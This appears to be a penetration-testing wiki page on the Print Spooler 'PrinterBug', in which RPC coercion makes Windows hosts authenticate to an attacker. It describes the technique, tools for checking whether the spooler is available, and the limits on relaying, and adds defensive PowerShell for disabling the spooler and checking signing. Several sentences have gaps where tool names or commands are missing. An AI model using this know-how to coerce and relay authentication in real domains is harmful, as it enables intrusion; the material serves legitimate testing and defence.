MS-RPRN abuse (PrinterBug)
Microsoft’s Print Spooler is a service that handles print jobs and various other tasks related to printing. An attacker controlling a domain user or computer account can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a host of the attacker's choosing. This flaw is a "won't fix" and is enabled by default on all Windows environments.
The coerced authentications are made over SMB. But MS-RPRN abuse can be combined with to elicit incoming authentications made over HTTP which heightens capabilities.
The "specific call" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.
Remotely checking whether the spooler is available can be done with (PowerShell) or with (Python).
The spooler service can be triggered with or (C#). There are many alternatives available publicly on the Internet.
rpcdump
We can check whether the spooler service is available on a target using rpcdump from impacket.
NetExec
NetExec (Python) can be used to check whether the spooler service is running.
SpoolerScanner
Check whether the spooler service is available (Windows) using SpoolerScanner (PowerShell).
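The checks above answer the question from the outside. The same question matters on the defensive side, because the only practical fix for a "won't fix" flaw is to not run the service where it is not needed (domain controllers first). The following PowerShell is an added example, not a tool from the page: it audits the Spooler service over CIM on a list of hosts and, with `-Disable`, stops it and sets its start mode to Disabled. It assumes CIM/WinRM access and local administrator rights on the targets, and the ActiveDirectory module for the domain-controller enumeration at the end.

```powershell
# Added example (not from the page): inventory hosts that still run the Print
# Spooler and optionally stop and disable it. Assumes CIM/WinRM reachability and
# local admin rights on each target for the -Disable path.
function Get-SpoolerExposure {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string[]] $ComputerName,
        [switch] $Disable
    )
    foreach ($computer in $ComputerName) {
        try {
            $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='Spooler'" `
                                   -ComputerName $computer -ErrorAction Stop
        } catch {
            # Unreachable or access denied: report it rather than silently skipping
            [pscustomobject]@{ Computer = $computer; State = 'Unreachable'; StartMode = $null; Action = 'none' }
            continue
        }
        $action = 'none'
        if ($Disable -and $svc.State -eq 'Running') {
            # Win32_Service exposes StopService and ChangeStartMode as CIM methods
            Invoke-CimMethod -InputObject $svc -MethodName StopService | Out-Null
            Invoke-CimMethod -InputObject $svc -MethodName ChangeStartMode `
                             -Arguments @{ StartMode = 'Disabled' } | Out-Null
            $action = 'stopped+disabled'
        }
        [pscustomobject]@{ Computer = $computer; State = $svc.State; StartMode = $svc.StartMode; Action = $action }
    }
}

# Usage: domain controllers have no business running the spooler, so audit them first.
# Add -Disable once the report has been reviewed.
$dcs = (Get-ADDomainController -Filter *).HostName
Get-SpoolerExposure -ComputerName $dcs | Format-Table -AutoSize
```

Run it without `-Disable` first; the report of `State`/`StartMode` per host is the inventory, and only hosts that genuinely need printing should keep the service.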
In the situation where the tester doesn't have any credentials, it is still possible to and trigger the spooler service of a target via a SOCKS proxy.
Nota bene: coerced NTLM authentications made over SMB restrict the possibilities of . For instance, an "unsigning cross-protocols relay attack" from SMB to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.
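The caveat above rests on signing: a coerced SMB authentication cannot be relayed to a service that requires signing or channel binding unless the signing requirement can be stripped. The following PowerShell is an added example, not part of the page, that reads the corresponding server-side settings on a domain controller so a defender can confirm the relay path is closed. It assumes it is run locally on the DC with administrative rights; the registry values it reads (`LDAPServerIntegrity`, `LdapEnforceChannelBinding`) are the standard NTDS parameters, and SMB signing comes from `Get-SmbServerConfiguration`.

```powershell
# Added example (not from the page): report whether a domain controller requires
# SMB signing, LDAP signing and LDAP channel binding. Run locally on the DC as admin.
function Get-RelayHardeningState {
    $ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    $reg  = Get-ItemProperty -Path $ntds -ErrorAction SilentlyContinue

    # LDAPServerIntegrity: 1 = none (default), 2 = require signing
    $ldapSigning = if ($reg.LDAPServerIntegrity) { [int]$reg.LDAPServerIntegrity } else { 1 }
    # LdapEnforceChannelBinding: 0 = never, 1 = when supported, 2 = always
    $cbt = if ($null -ne $reg.LdapEnforceChannelBinding) { [int]$reg.LdapEnforceChannelBinding } else { 0 }

    $smb = Get-SmbServerConfiguration

    [pscustomobject]@{
        SmbSigningRequired        = [bool]$smb.RequireSecuritySignature
        LdapSigningRequired       = ($ldapSigning -eq 2)
        LdapChannelBindingAlways  = ($cbt -eq 2)
        # Relay from SMB to LDAP is blocked when LDAP signing is required;
        # LDAPS relay additionally needs channel binding to be enforced.
        SmbToLdapRelayBlocked     = ($ldapSigning -eq 2)
        SmbToLdapsRelayBlocked    = ($cbt -eq 2)
    }
}

Get-RelayHardeningState | Format-List
```

Any `False` in the last two fields means the page's SMB-to-LDAP caveat is the only thing standing between a coerced authentication and the directory, which is a weaker position than requiring signing outright.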